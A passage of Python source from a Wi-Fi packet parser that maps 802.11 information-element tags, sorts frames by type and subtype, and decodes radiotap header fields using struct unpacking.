6: "TAG_IBSS_PARAMETER",
7: "TAG_COUNTRY_INFO",
8: "TAG_FH_HOPPING_PARAMETER",
9: "TAG_FH_HOPPING_TABLE",
10: "TAG_REQUEST",
11: "TAG_QBSS_LOAD",
12: "TAG_EDCA_PARAM_SET",
13: "TAG_TSPEC",
14: "TAG_TCLAS",
15: "TAG_SCHEDULE",
16: "TAG_CHALLENGE_TEXT",
32: "TAG_POWER_CONSTRAINT",
33: "TAG_POWER_CAPABILITY",
34: "TAG_TPC_REQUEST",
35: "TAG_TPC_REPORT",
36: "TAG_SUPPORTED_CHANNELS",
37: "TAG_CHANNEL_SWITCH_ANN",
38: "TAG_MEASURE_REQ",
39: "TAG_MEASURE_REP",
40: "TAG_QUIET",
41: "TAG_IBSS_DFS",
42: "TAG_ERP_INFO",
43: "TAG_TS_DELAY",
44: "TAG_TCLAS_PROCESS",
45: "TAG_HT_CAPABILITY",
46: "TAG_QOS_CAPABILITY",
47: "TAG_ERP_INFO_OLD",
48: "TAG_RSN_IE",
50: "TAG_EXT_SUPP_RATES",
51: "TAG_AP_CHANNEL_REPORT",
52: "TAG_NEIGHBOR_REPORT",
53: "TAG_RCPI",
54: "TAG_MOBILITY_DOMAIN",
55: "TAG_FAST_BSS_TRANSITION",
56: "TAG_TIMEOUT_INTERVAL",
57: "TAG_RIC_DATA",
58: "TAG_DSE_REG_LOCATION",
59: "TAG_SUPPORTED_OPERATING_CLASSES",
60: "TAG_EXTENDED_CHANNEL_SWITCH_ANNOUNCEMENT",
61: "TAG_HT_INFO",
62: "TAG_SECONDARY_CHANNEL_OFFSET",
63: "TAG_BSS_AVG_ACCESS_DELAY",
64: "TAG_ANTENNA",
65: "TAG_RSNI",
66: "TAG_MEASURE_PILOT_TRANS",
67: "TAG_BSS_AVB_ADM_CAPACITY",
68: "TAG_BSS_AC_ACCESS_DELAY",
69: "TAG_TIME_ADV",
70: "TAG_RM_ENABLED_CAPABILITY",
71: "TAG_MULTIPLE_BSSID",
72: "TAG_20_40_BSS_CO_EX",
73: "TAG_20_40_BSS_INTOL_CH_REP",
74: "TAG_OVERLAP_BSS_SCAN_PAR",
75: "TAG_RIC_DESCRIPTOR",
76: "TAG_MMIE",
78: "TAG_EVENT_REQUEST",
79: "TAG_EVENT_REPORT",
80: "TAG_DIAGNOSTIC_REQUEST",
81: "TAG_DIAGNOSTIC_REPORT",
82: "TAG_LOCATION_PARAMETERS",
83: "TAG_NO_BSSID_CAPABILITY",
84: "TAG_SSID_LIST",
85: "TAG_MULTIPLE_BSSID_INDEX",
86: "TAG_FMS_DESCRIPTOR",
87: "TAG_FMS_REQUEST",
88: "TAG_FMS_RESPONSE",
89: "TAG_QOS_TRAFFIC_CAPABILITY",
90: "TAG_BSS_MAX_IDLE_PERIOD",
91: "TAG_TFS_REQUEST",
92: "TAG_TFS_RESPONSE",
93: "TAG_WNM_SLEEP_MODE",
94: "TAG_TIM_BROADCAST_REQUEST",
95: "TAG_TIM_BROADCAST_RESPONSE",
96: "TAG_COLLOCATED_INTER_REPORT",
97: "TAG_CHANNEL_USAGE",
98: "TAG_TIME_ZONE",
99: "TAG_DMS_REQUEST",
100: "TAG_DMS_RESPONSE",
101: "TAG_LINK_IDENTIFIER",
102: "TAG_WAKEUP_SCHEDULE",
104: "TAG_CHANNEL_SWITCH_TIMING",
105: "TAG_PTI_CONTROL",
106: "TAG_PU_BUFFER_STATUS",
107: "TAG_INTERWORKING",
108: "TAG_ADVERTISEMENT_PROTOCOL",
109: "TAG_EXPIDITED_BANDWIDTH_REQ",
110: "TAG_QOS_MAP_SET",
111: "TAG_ROAMING_CONSORTIUM",
112: "TAG_EMERGENCY_ALERT_ID",
113: "TAG_MESH_CONFIGURATION",
114: "TAG_MESH_ID",
115: "TAG_MESH_LINK_METRIC_REPORT",
116: "TAG_CONGESTION_NOTIFICATION",
117: "TAG_MESH_PEERING_MGMT",
118: "TAG_MESH_CHANNEL_SWITCH",
119: "TAG_MESH_AWAKE_WINDOW",
120: "TAG_BEACON_TIMING",
121: "TAG_MCCAOP_SETUP_REQUEST",
122: "TAG_MCCAOP_SETUP_REPLY",
123: "TAG_MCCAOP_ADVERTISEMENT",
124: "TAG_MCCAOP_TEARDOWN",
125: "TAG_GANN",
126: "TAG_RANN",
127: "TAG_EXTENDED_CAPABILITIES",
128: "TAG_AGERE_PROPRIETARY",
130: "TAG_MESH_PREQ",
131: "TAG_MESH_PREP",
132: "TAG_MESH_PERR",
133: "TAG_CISCO_CCX1_CKIP",
136: "TAG_CISCO_CCX2",
137: "TAG_PXU",
138: "TAG_PXUC",
139: "TAG_AUTH_MESH_PEERING_EXCH",
140: "TAG_MIC",
141: "TAG_DESTINATION_URI",
142: "TAG_U_APSD_COEX",
143: "TAG_WAKEUP_SCHEDULE_AD",
144: "TAG_EXTENDED_SCHEDULE",
145: "TAG_STA_AVAILABILITY",
146: "TAG_DMG_TSPEC",
147: "TAG_NEXT_DMG_ATI",
148: "TAG_DMG_CAPABILITIES",
149: "TAG_CISCO_CCX3",
150: "TAG_CISCO_VENDOR_SPECIFIC",
151: "TAG_DMG_OPERATION",
152: "TAG_DMG_BSS_PRAMTER_CHANGE",
153: "TAG_DMG_BEAM_REFINEMENT",
154: "TAG_CHANNEL_MEASURMENT_FB",
157: "TAG_AWAKE_WINDOW",
158: "TAG_MULTI_BAND",
159: "TAG_ADDBA_EXT",
160: "TAG_NEXTPCP_LIST",
161: "TAG_PCP_HANDOVER",
162: "TAG_DMG_LINK_MARGIN",
163: "TAG_SWITCHING_STREAM",
164: "TAG_SESSION_TRANSMISSION",
165: "TAG_DYN_TONE_PAIR_REP",
166: "TAG_CLUSTER_REP",
167: "TAG_RELAY_CAPABILITIES",
168: "TAG_RELAY_TRANSFER_PARAM",
169: "TAG_BEAMLINK_MAINTAINCE",
170: "TAG_MULTIPLE_MAC_SUBLAYERS",
171: "TAG_U_PID",
172: "TAG_DMG_LINK_ADAPTION_ACK",
173: "TAG_SYMBOL_PROPRIETARY",
174: "TAG_MCCAOP_ADVERTISEMENT_OV",
175: "TAG_QUIET_PERIOD_REQ",
177: "TAG_QUIET_PERIOD_RES",
182: "TAG_ECPAC_POLICY",
183: "TAG_CLUSTER_TIME_OFFSET",
190: "TAG_ANTENNA_SECTOR_ID",
191: "TAG_VHT_CAPABILITY",
192: "TAG_VHT_OPERATION",
193: "TAG_EXT_BSS_LOAD",
194: "TAG_WIDE_BW_CHANNEL_SWITCH",
195: "TAG_VHT_TX_PWR_ENVELOPE",
196: "TAG_CHANNEL_SWITCH_WRAPPER",
199: "TAG_OPERATING_MODE_NOTIFICATION",
221: "TAG_VENDOR_SPECIFIC_IE"
}
def WIFI(frame, no_rtap=False):
"""calls wifi packet discriminator and constructor.
:frame: ctypes.Structure
:no_rtap: Bool
    :return: packet object on success
    :return: None
        if parsing raised an exception (the exception is logged)
"""
pack = None
try:
pack = WiHelper.get_wifi_packet(frame, no_rtap)
except Exception as e:
logging.exception(e)
return pack
class WiHelper:
"""Wi-Fi packet discriminator class.
Identifies type and subtype of packet, then trigs
packet object creation.
"""
@staticmethod
def get_wifi_packet(frame, no_rtap=False):
"""Discriminates Wi-Fi packet and creates
packet object.
:frame: ctypes.Structure
:no_rtap: Bool
:return: obj
Wi-Fi packet
"""
_, packet = WiHelper._strip_rtap(frame)
frame_control = struct.unpack('BB', packet[:2])
cat = (frame_control[0] >> 2) & 0b0011
s_type = frame_control[0] >> 4
if cat not in _CATEGORIES_.keys():
logging.warning("unknown category: %d" % (cat))
return Unknown(frame, no_rtap)
if s_type not in _SUBTYPES_[cat].keys():
logging.warning("unknown subtype %d in %s category" % (s_type, _CATEGORIES_[cat]))
return Unknown(frame, no_rtap)
if cat == 0:
if s_type == 4:
return ProbeReq(frame, no_rtap)
elif s_type == 5:
return ProbeResp(frame, no_rtap)
elif s_type == 8:
return Beacon(frame, no_rtap)
else:
return Management(frame, no_rtap)
elif cat == 1:
if s_type == 11:
return RTS(frame, no_rtap)
elif s_type == 12:
return CTS(frame, no_rtap)
elif s_type == 9:
return BACK(frame, no_rtap)
else:
return Control(frame, no_rtap)
elif cat == 2:
if s_type == 8:
return QosData(frame, no_rtap, parse_amsdu=True)
else:
return Data(frame, no_rtap)
@staticmethod
def _strip_rtap(frame):
"""strip injected radiotap header.
:return: ctypes.Structure
radiotap header
:return: ctypes.Structure
actual layer 2 Wi-Fi payload
"""
rtap_len = WiHelper.__get_rtap_len(frame)
rtap = frame[:rtap_len]
packet = frame[rtap_len:]
return rtap, packet
@staticmethod
def __get_rtap_len(frame):
"""parse length of radiotap header.
:packet: ctypes.structure
:return: int
"""
r_len = struct.unpack('H', frame[2:4])
return r_len[0]
class Radiotap(ctypes.Structure):
"""Radiotap Header Parser Class.
Radiotap headers summarize physical layer parameters
of Wi-Fi packet, such as MCS(modulation and coding scheme),
NSS(number of spatial streams), BW(bandwidth) for all common
protocol types(802.11a, 802.11n, 802.11ac etc.)
see -> http://www.radiotap.org/defined-fields
see -> https://github.com/boundary/wireshark/blob/master/epan/dissectors/packet-ieee80211-radiotap-defs.h
"""
_rfields_ = [('vers', ctypes.c_uint8),
('pad', ctypes.c_uint8),
('len', ctypes.c_uint16),
('present.tsft', ctypes.c_bool),
('present.flags', ctypes.c_bool),
('present.rate', ctypes.c_bool),
('present.channel', ctypes.c_bool),
('present.fhss', ctypes.c_bool),
('present.dbm_antsignal', ctypes.c_bool),
('present.dbm_antnoise', ctypes.c_bool),
('present.lock_quality', ctypes.c_bool),
('present.tx_attenuation', ctypes.c_bool),
('present.db_tx_attenuation', ctypes.c_bool),
('present.dbm_tx_power', ctypes.c_bool),
('present.antenna', ctypes.c_bool),
('present.db_antsignal', ctypes.c_bool),
('present.db_antnoise', ctypes.c_bool),
('present.rxflags', ctypes.c_bool),
('present.txflags', ctypes.c_bool),
('present.rts_retries', ctypes.c_bool),
('present.data_retries', ctypes.c_bool),
('present.xchannel', ctypes.c_bool),
('present.mcs', ctypes.c_bool),
('present.ampdu', ctypes.c_bool),
('present.vht', ctypes.c_bool),
('present.rtap_ns', ctypes.c_bool),
('present.ven_ns', ctypes.c_bool),
('present.ext', ctypes.c_bool),
('mactime', ctypes.c_uint64),
('flags.cfp', ctypes.c_bool),
('flags.preamble', ctypes.c_bool),
('flags.wep', ctypes.c_bool),
('flags.fragmentation', ctypes.c_bool),
('flags.fcs', ctypes.c_bool),
('flags.datapad', ctypes.c_bool),
('flags.badfcs', ctypes.c_bool),
('flags.shortgi', ctypes.c_bool),
('rate', ctypes.c_uint),
('chan.freq', ctypes.c_uint),
('chan.turbo', ctypes.c_bool),
('chan.cck', ctypes.c_bool),
('chan.ofdm', ctypes.c_bool),
('chan.two_g', ctypes.c_bool),
('chan.five_g', ctypes.c_bool),
('chan.passive', ctypes.c_bool),
('chan.dynamic', ctypes.c_bool),
('chan.gfsk', ctypes.c_bool),
('chan.gsm', ctypes.c_bool),
('chan.static_turbo', ctypes.c_bool),
('chan.half_rate', ctypes.c_bool),
('chan.quarter_rate', ctypes.c_bool),
('fhss.hopset', ctypes.c_int),
('fhss.pattern', ctypes.c_uint),
('dbm_antsignal', ctypes.c_uint),
('dbm_antnoise', ctypes.c_uint),
('lock_quality', ctypes.c_uint),
('tx_attenuation', ctypes.c_uint),
('db_tx_attenuation', ctypes.c_uint),
('dbm_tx_power', ctypes.c_uint),
('antenna', ctypes.c_uint),
('db_antsignal', ctypes.c_uint),
('db_antnoise', ctypes.c_uint),
('rxflags.reserved', ctypes.c_bool),
('rxflags.badplcp', ctypes.c_bool),
('txflags', ctypes.c_uint),
('rts_retries', ctypes.c_uint),
('data_retries', ctypes.c_uint),
('xchannel.freq', ctypes.c_uint),
('xchannel.channel', ctypes.c_uint),
('xchannel.max_power', ctypes.c_uint),
('xchannel.flags.turbo', ctypes.c_bool),
('xchannel.flags.cck', ctypes.c_bool),
('xchannel.flags.ofdm', ctypes.c_bool),
('xchannel.flags.two_g', ctypes.c_bool),
('xchannel.flags.five_g', ctypes.c_bool),
('xchannel.flags.passive', ctypes.c_bool),
('xchannel.flags.dynamic', ctypes.c_bool),
('xchannel.flags.gfsk', ctypes.c_bool),
('xchannel.flags.gsm', ctypes.c_bool),
('xchannel.flags.sturbo', ctypes.c_bool),
('xchannel.flags.half', ctypes.c_bool),
('xchannel.flags.quarter', ctypes.c_bool),
('xchannel.flags.ht_20', ctypes.c_bool),
('xchannel.flags.ht_40u', ctypes.c_bool),
('xchannel.flags.ht_40d', ctypes.c_bool),
('mcs.known', ctypes.c_uint8),
('mcs.index', ctypes.c_uint8),
('mcs.have_bw', ctypes.c_bool),
('mcs.have_mcs', ctypes.c_bool),
('mcs.have_gi', ctypes.c_bool),
('mcs.have_format', ctypes.c_bool),
('mcs.have_fec', ctypes.c_bool),
('mcs.have_stbc', ctypes.c_bool),
('mcs.have_ness', ctypes.c_bool),
('mcs.ness_bit1', ctypes.c_bool),
('ampdu.refnum', ctypes.c_uint),
('ampdu.crc_val', ctypes.c_uint8),
('ampdu.reserved', ctypes.c_uint8),
('ampdu.flags.report_zerolen', ctypes.c_bool),
('ampdu.flags.is_zerolen', ctypes.c_bool),
('ampdu.flags.lastknown', ctypes.c_bool),
('ampdu.flags.last', ctypes.c_bool),
('ampdu.flags.delim_crc_error', ctypes.c_bool),
('vht.known_bits', ctypes.c_char_p),
('vht.have_stbc', ctypes.c_bool),
('vht.have_txop_ps', ctypes.c_bool),
('vht.have_gi', ctypes.c_bool),
('vht.have_sgi_nsym_da', ctypes.c_bool),
('vht.have_ldpc_extra', ctypes.c_bool),
('vht.have_beamformed', ctypes.c_bool),
('vht.have_bw', ctypes.c_bool),
('vht.have_gid', ctypes.c_bool),
('vht.have_paid', ctypes.c_bool),
('vht.flag_bits', ctypes.c_bool),
('vht.stbc', ctypes.c_bool),
('vht.txop_ps', ctypes.c_bool),
('vht.gi', ctypes.c_bool),
('vht.sgi_nysm_da', ctypes.c_bool),
('vht.ldpc_extra', ctypes.c_bool),
('vht.beamformed', ctypes.c_bool),
('vht.group_id', ctypes.c_bool),
('vht.partial_id', ctypes.c_bool),
('vht.bw', ctypes.c_uint),
('vht.user_0.nss', ctypes.c_bool),
('vht.user_0.mcs', ctypes.c_bool),
('vht.user_0.coding', ctypes.c_bool),
('vht.user_1.nss', ctypes.c_bool),
('vht.user_1.mcs', ctypes.c_bool),
('vht.user_1.coding', ctypes.c_bool),
('vht.user_2.nss', ctypes.c_bool),
('vht.user_2.mcs', ctypes.c_bool),
('vht.user_2.coding', ctypes.c_bool),
('vht.user_3.nss', ctypes.c_bool),
('vht.user_3.mcs', ctypes.c_bool),
('vht.user_3.coding', ctypes.c_bool),
('prot_type', ctypes.c_char_p)]
# Wireshark syntax conjugates of fields in object
_r_shark_ = {'radiotap.version': 'vers',
'radiotap.pad': 'pad',
'radiotap.length': 'len',
'radiotap.present.tsft': 'present.tsft',
'radiotap.present.flags': 'present.flags',
'radiotap.present.rate': 'present.rate',
'radiotap.present.channel': 'present.channel',
'radiotap.present.fhss': 'present.fhss',
'radiotap.present.dbm_antsignal': 'present.dbm_antsignal',
'radiotap.present.dbm_antnoise': 'present.dbm_antnoise',
'radiotap.present.lock_quality': 'present.lock_quality',
'radiotap.present.tx_attenuation': 'present.tx_attenuation',
'radiotap.present.db_tx_attenuation': 'present.db_tx_attenuation',
'radiotap.present.dbm_tx_power': 'present.dbm_tx_power',
'radiotap.present.antenna': 'present.antenna',
'radiotap.present.db_antsignal': 'present.db_antsignal',
'radiotap.present.db_antnoise': 'present.db_antnoise',
'radiotap.present.rxflags': 'present.rxflags',
'radiotap.present.xchannel': 'present.xchannel',
'radiotap.present.mcs': 'present.mcs',
'radiotap.present.ampdu': 'present.ampdu',
'radiotap.present.vht': 'present.vht',
'radiotap.present.rtap_ns': 'present.rtap_ns',
'radiotap.present.vendor_ns': 'present.ven_ns',
'radiotap.present.ext': 'present.ext',
'radiotap.mactime': 'mactime',
'radiotap.flags.cfp': 'flags.cfp',
'radiotap.flags.preamble': 'flags.preamble',
'radiotap.flags.wep': 'flags.wep',
'radiotap.flags.frag': 'flags.fragmentation',
'radiotap.flags.fcs': 'flags.fcs',
'radiotap.flags.datapad': 'flags.datapad',
'radiotap.flags.badfcs': 'flags.badfcs',
'radiotap.flags.shortgi': 'flags.shortgi',
'radiotap.datarate': 'rate',
'radiotap.channel.freq': 'chan.freq',
'radiotap.channel.flags.turbo': 'chan.turbo',
'radiotap.channel.flags.cck': 'chan.cck',
'radiotap.channel.flags.ofdm': 'chan.ofdm',
'radiotap.channel.flags.2ghz': 'chan.two_g',
'radiotap.channel.flags.5ghz': 'chan.five_g',
'radiotap.channel.flags.passive': 'chan.passive',
'radiotap.channel.flags.dynamic': 'chan.dynamic',
'radiotap.channel.flags.gfsk': 'chan.gfsk',
'radiotap.channel.flags.gsm': 'chan.gsm',
'radiotap.channel.flags.sturbo': 'chan.static_turbo',
'radiotap.channel.flags.half': 'chan.half_rate',
'radiotap.channel.flags.quarter': 'chan.quarter_rate',
'radiotap.fhss.hopset': 'fhss.hopset',
'radiotap.fhss.pattern': 'fhss.pattern',
'radiotap.dbm_antsignal': 'dbm_antsignal',
'radiotap.dbm_antnoise': 'dbm_antnoise',
'radiotap.antenna': 'antenna',
'radiotap.db_antsignal': 'db_antsignal',
'radiotap.db_antnoise': 'db_antnoise',
'radiotap.rxflags.badplcp': 'rxflags.badplcp',
'radiotap.xchannel.freq': 'xchannel.freq',
'radiotap.xchannel.channel': 'xchannel.channel',
'radiotap.xchannel.flags.turbo': 'xchannel.flags.turbo',
'radiotap.xchannel.flags.cck': 'xchannel.flags.cck',
'radiotap.xchannel.flags.ofdm': 'xchannel.flags.ofdm',
'radiotap.xchannel.flags.2ghz': 'xchannel.flags.two_g',
'radiotap.xchannel.flags.5ghz': 'xchannel.flags.five_g',
'radiotap.xchannel.flags.passive': 'xchannel.flags.passive',
'radiotap.xchannel.flags.dynamic': 'xchannel.flags.dynamic',
'radiotap.xchannel.flags.gfsk': 'xchannel.flags.gfsk',
'radiotap.xchannel.flags.gsm': 'xchannel.flags.gsm',
'radiotap.xchannel.flags.sturbo': 'xchannel.flags.sturbo',
'radiotap.xchannel.flags.half': 'xchannel.flags.half',
'radiotap.xchannel.flags.quarter': 'xchannel.flags.quarter',
'radiotap.xchannel.flags.ht20': 'xchannel.flags.ht_20',
'radiotap.xchannel.flags.ht40u': 'xchannel.flags.ht_40u',
'radiotap.xchannel.flags.ht40d': 'xchannel.flags.ht_40d',
'radiotap.mcs.known': 'mcs.known',
'radiotap.mcs.index': 'mcs.index',
'radiotap.mcs.have_bw': 'mcs.have_bw',
'radiotap.mcs.have_gi': 'mcs.have_gi',
'radiotap.mcs.have_format': 'mcs.have_format',
'radiotap.mcs.have_fec': 'mcs.have_fec',
'radiotap.mcs.have_stbc': 'mcs.have_stbc',
'radiotap.mcs.have_ness': 'mcs.have_ness',
'radiotap.mcs.ness_bit1': 'mcs.ness_bit1',
'radiotap.ampdu.reference': 'ampdu.refnum',
'radiotap.ampdu.crc_val': 'ampdu.crc_val',
'radiotap.ampdu.reserved': 'ampdu.reserved',
'radiotap.ampdu.flags.report_zerolen': 'ampdu.flags.report_zerolen',
'radiotap.ampdu.flags.is_zerolen': 'ampdu.flags.is_zerolen',
'radiotap.ampdu.flags.lastknown': 'ampdu.flags.lastknown',
'radiotap.ampdu.flags.last': 'ampdu.flags.last',
'radiotap.ampdu.flags.delim_crc_error': 'ampdu.flags.delim_crc_error',
'radiotap.vht.have_stbc': 'vht.have_stbc',
'radiotap.vht.have_txop_ps': 'vht.have_txop_ps',
'radiotap.vht.have_gi': 'vht.have_gi',
'radiotap.vht.have_sgi_nsym_da': 'vht.have_sgi_nsym_da',
'radiotap.vht.have_ldpc_extra': 'vht.have_ldpc_extra', # wireshark does not seem to use the have_ prefix here,
'radiotap.vht.have_beamformed': 'vht.have_beamformed', # which would conflict with ldpc_extra below, so we keep
'radiotap.vht.have_bw': 'vht.have_bw', # the radiotap-style syntax.
'radiotap.vht.have_gid': 'vht.have_gid',
'radiotap.vht.have_paid': 'vht.have_paid',
'radiotap.vht.stbc': 'vht.stbc',
'radiotap.vht.txop_ps': 'vht.txop_ps',
'radiotap.vht.gi': 'vht.gi',
'radiotap.vht.sgi_nysm_da': 'vht.sgi_nysm_da',
'radiotap.vht.ldpc_extra': 'vht.ldpc_extra',
'radiotap.vht.beamformed': 'vht.beamformed',
'radiotap.vht.gid': 'vht.group_id',
'radiotap.vht.paid': 'vht.partial_id',
'radiotap.vht.bw': 'vht.bw',
'radiotap.vht.nss.0': 'vht.user_0.nss',
'radiotap.vht.mcs.0': 'vht.user_0.mcs',
'radiotap.vht.coding.0': 'vht.user_0.coding',
'radiotap.vht.nss.1': 'vht.user_1.nss',
'radiotap.vht.mcs.1': 'vht.user_1.mcs',
'radiotap.vht.coding.1': 'vht.user_1.coding',
'radiotap.vht.nss.2': 'vht.user_2.nss',
'radiotap.vht.mcs.2': 'vht.user_2.mcs',
'radiotap.vht.coding.2': 'vht.user_2.coding',
'radiotap.vht.nss.3': 'vht.user_3.nss',
'radiotap.vht.mcs.3': 'vht.user_3.mcs',
'radiotap.vht.coding.3': 'vht.user_3.coding'}
def __init__(self, rtap_bytes):
"""Constructor method.
:rtap_bytes: ctypes.Structure
"""
super(Radiotap, self).__init__()
self._raw = {} # contains raw bytes, for debugging purposes
self._bits = {} # contains bitstrings, for debugging purposes
idx = 0
self._rtap = rtap_bytes
# parse radiotap headers
self.vers = Radiotap.strip_vers(self._rtap[idx:idx + 1])
idx += 1
self.pad = Radiotap.strip_pad(self._rtap[idx:idx + 1])
idx += 1
self.len = Radiotap.strip_len(self._rtap[idx:idx + 2])
idx += 2
self.present, self.present_bits = Radiotap.strip_present(self._rtap[idx:idx + 4])
idx += 4
# parse radiotap payload
if self.present.tsft: # 8 byte
idx, self.mactime = self.strip_tsft(idx)
if self.present.flags: # 1 byte
idx, self.flags = self.strip_flags(idx)
if self.present.rate: # 1 byte
idx, self.rate = self.strip_rate(idx)
if self.present.channel: # 2 byte (align 2 byte)
idx, self.chan = self.strip_chan(idx)
if self.present.fhss: # 2 byte
idx, self.fhss = self.strip_fhss(idx)
if self.present.dbm_antsignal: # 1 byte
idx, self.dbm_antsignal = self.strip_dbm_antsignal(idx)
if self.present.dbm_antnoise: # 1 byte
idx, self.dbm_antnoise = self.strip_dbm_antnoise(idx)
if self.present.lock_quality: # 2 byte (align 2 byte)
idx, self.lock_quality = self.strip_lock_quality(idx)
if self.present.tx_attenuation: # 1 byte (align 2 byte)
idx, self.tx_attenuation = self.strip_tx_attenuation(idx)
if self.present.db_tx_attenuation: # 1 byte (align 2 byte)
idx, self.db_tx_attenuation = self.strip_db_tx_attenuation(idx)
if self.present.dbm_tx_power: # 1 byte (align 1 byte)
idx, self.dbm_tx_power = self.strip_dbm_tx_power(idx)
if self.present.antenna: # 1 byte
idx, self.antenna = self.strip_antenna(idx)
if self.present.db_antsignal: # 1 byte
idx, self.db_antsignal = self.strip_db_antsignal(idx)
if self.present.db_antnoise: # 1 byte
idx, self.db_antnoise = self.strip_db_antnoise(idx)
if self.present.rxflags: # 2 byte (align 2 byte)
idx, self.rxflags = self.strip_rx_flags(idx)
if self.present.txflags: # 1 byte (align 2 byte)
idx, self.txflags = self.strip_tx_flags(idx)
if self.present.rts_retries: # 1 byte
idx, self.rts_retries = self.strip_rts_retries(idx)
if self.present.data_retries: # 1 byte
idx, self.data_retries = self.strip_data_retries(idx)
if self.present.xchannel: # 7 byte (align 2 byte)
idx, self.xchannel = self.strip_xchannel(idx)
if self.present.mcs: # 3 byte (align 1 byte)
idx, self.mcs = self.strip_mcs(idx)
if self.present.ampdu: # 8 byte (align 4 byte)
idx, self.ampdu = self.strip_ampdu(idx)
if self.present.vht: # 12 byte (align 2 byte)
idx, self.vht = self.strip_vht(idx)
self.prot_type = self.extract_protocol()
@staticmethod
def strip_vers(payload):
"""strip(1 byte) radiotap.version
:payload: ctypes.Structure
:return: int
"""
return struct.unpack('B', payload)[0]
@staticmethod
def strip_pad(payload):
"""strip(1 byte) radiotap.pad
:payload: ctypes.Structure
:return: int
"""
return struct.unpack('B', payload)[0]
@staticmethod
def strip_len(payload):
"""strip(2 byte) radiotap.length
:payload: ctypes.Structure
:return: int
"""
return struct.unpack('H', payload)[0]
@staticmethod
def strip_present(payload):
"""strip(4 byte) radiotap.present. Those are flags that
identify existence of incoming radiotap meta-data.
:idx: int
:return: str
:return: namedtuple
"""
present = collections.namedtuple(
'present', ['tsft', 'flags', 'rate', 'channel', 'fhss',
'dbm_antsignal', 'dbm_antnoise', 'lock_quality',
'tx_attenuation', 'db_tx_attenuation', 'dbm_tx_power',
'antenna', 'db_antsignal', 'db_antnoise', 'rxflags',
'txflags', 'rts_retries', 'data_retries', 'xchannel',
'mcs', 'ampdu', 'vht', 'rtap_ns', 'ven_ns', 'ext'])
val = struct.unpack('<L', payload)[0]
bits = format(val, '032b')[::-1]
present.tsft = int(bits[0]) # timer synchronization function
present.flags = int(bits[1]) # flags
present.rate = int(bits[2]) # rate
present.channel = int(bits[3]) # channel
present.fhss = int(bits[4]) # frequency hopping spread spectrum
present.dbm_antsignal = int(bits[5]) # dbm antenna signal
present.dbm_antnoise = int(bits[6]) # dbm antenna noise
present.lock_quality = int(bits[7]) # quality of barker code lock
present.tx_attenuation = int(bits[8]) # transmitter attenuation
present.db_tx_attenuation = int(bits[9]) # decibel transmit attenuation
present.dbm_tx_power = int(bits[10]) # dbm transmit power
present.antenna = int(bits[11]) # antenna
present.db_antsignal = int(bits[12]) # db antenna signal
present.db_antnoise = int(bits[13]) # db antenna noise
present.rxflags = int(bits[14]) # receiver flags
present.txflags = int(bits[15]) # transmitter flags
present.rts_retries = int(bits[16]) # rts(request to send) retries
present.data_retries = int(bits[17]) # data retries
present.xchannel = int(bits[18]) # xchannel
present.mcs = int(bits[19]) # modulation and coding scheme
present.ampdu = int(bits[20]) # aggregated mac protocol data unit
present.vht = int(bits[21]) # very high throughput
present.rtap_ns = int(bits[29]) # radiotap namespace
present.ven_ns = int(bits[30]) # vendor namespace
present.ext = int(bits[31]) # extension
return present, bits
def strip_tsft(self, idx):
"""strip(8 byte) radiotap.mactime
:idx: int
:return: int
idx
:return: int
mactime
"""
idx = Radiotap.align(idx, 8)
mactime, = struct.unpack_from('<Q', self._rtap, idx)
return idx + 8, mactime
def strip_flags(self, idx):
"""strip(1 byte) radiotap.flags
:idx: int
:return: int
idx
:return: collections.namedtuple
"""
flags = collections.namedtuple(
'flags', ['cfp', 'preamble', 'wep', 'fragmentation', 'fcs',
'datapad', 'badfcs', 'shortgi'])
val, = struct.unpack_from('<B', self._rtap, idx)
bits = format(val, '08b')[::-1]
flags.cfp = int(bits[0])
flags.preamble = int(bits[1])
flags.wep = int(bits[2])
flags.fragmentation = int(bits[3])
flags.fcs = int(bits[4])
flags.datapad = int(bits[5])
flags.badfcs = int(bits[6])
flags.shortgi = int(bits[7])
return idx + 1, flags
def strip_rate(self, idx):
"""strip(1 byte) radiotap.datarate
note that, unit of this field is originally 0.5 Mbps
:idx: int
:return: int
idx
:return: double
rate in terms of Mbps
"""
val, = struct.unpack_from('<B', self._rtap, idx)
rate_unit = float(1) / 2 # Mbps
return idx + 1, rate_unit * val
def strip_chan(self, idx):
"""strip(2 byte) radiotap.channel.flags
:idx: int
:return: int
idx
:return: collections.namedtuple
"""
chan = collections.namedtuple(
'chan', ['freq', 'turbo', 'cck', 'ofdm', 'two_g', 'five_g',
'passive', 'dynamic', 'gfsk', 'gsm', 'static_turbo',
'half_rate', 'quarter_rate'])
idx = Radiotap.align(idx, 2)
freq, flags, = struct.unpack_from('<HH', self._rtap, idx)
chan.freq = freq
bits = format(flags, '016b')[::-1]
chan.turbo = int(bits[4])
chan.cck = int(bits[5])
chan.ofdm = int(bits[6])
chan.two_g = int(bits[7])
chan.five_g = int(bits[8])
chan.passive = int(bits[9])
chan.dynamic = int(bits[10])
chan.gfsk = int(bits[11])
chan.gsm = int(bits[12])
chan.static_turbo = int(bits[13])
chan.half_rate = int(bits[14])
chan.quarter_rate = int(bits[15])
return idx + 4, chan
def strip_fhss(self, idx):
"""strip (2 byte) radiotap.fhss.hopset(1 byte) and
radiotap.fhss.pattern(1 byte)
:idx: int
:return: int
idx
:return: collections.namedtuple
"""
fhss = collections.namedtuple('fhss', ['hopset', 'pattern'])
fhss.hopset, fhss.pattern, = struct.unpack_from('<bb', self._rtap, idx)
return idx + 2, fhss
def strip_dbm_antsignal(self, idx):
"""strip(1 byte) radiotap.dbm.ant_signal
:idx: int
:return: int
idx
:return: int
"""
dbm_antsignal, = struct.unpack_from('<b', self._rtap, idx)
return idx + 1, dbm_antsignal
def strip_dbm_antnoise(self, idx):
"""strip(1 byte) radiotap.dbm_antnoise
:idx: int
:return: int
idx
:return: int
"""
dbm_antnoise, = struct.unpack_from('<b', self._rtap, idx)
return idx + 1, dbm_antnoise
def strip_lock_quality(self, idx):
"""strip(2 byte) lock quality
:idx: int
:return: int
idx
:return: int
"""
idx = Radiotap.align(idx, 2)
lock_quality, = struct.unpack_from('<H', self._rtap, idx)
return idx + 2, lock_quality
def strip_tx_attenuation(self, idx):
"""strip(1 byte) tx_attenuation
:idx: int
:return: int
idx
:return: int
"""
idx = Radiotap.align(idx, 2)
tx_attenuation, = struct.unpack_from('<H', self._rtap, idx)
return idx + 2, tx_attenuation
def strip_db_tx_attenuation(self, idx):
"""strip(1 byte) db_tx_attenuation
:return: int
idx
:return: int
"""
idx = Radiotap.align(idx, 2)
db_tx_attenuation, = struct.unpack_from('<H', self._rtap, idx)
return idx + 2, db_tx_attenuation
